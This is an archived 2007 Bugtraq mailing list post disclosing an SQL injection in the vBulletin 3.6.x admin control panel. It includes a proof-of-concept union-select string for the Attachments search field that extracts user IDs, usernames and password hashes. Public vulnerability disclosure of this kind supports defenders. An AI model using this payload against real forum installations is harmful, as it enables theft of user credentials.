Bugtraq mailing list archives
vbulletin admincp sql injection
From: disfigure <disfigure () gmail com>
Date: Tue, 13 Mar 2007 12:41:59 -0500
/****************************************/ CREDIT: discovered by meto5757 and disfigure PRODUCT: vBulletin http://www.vbulletin.com/ VULNERABILITY: SQL Injection NOTES: - not a serious vulnerability, can only be used by administrator of site - SQL injection can be used to obtain password hash - tested on 3.6.4 and 3.6.5 POC: 1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field: ') union select 1,1,1,1,1,userid,password,1,username from user -- 9 greets: w4ck1ng.com /****************************************/
Current thread:
- vbulletin admincp sql injection disfigure (Mar 15)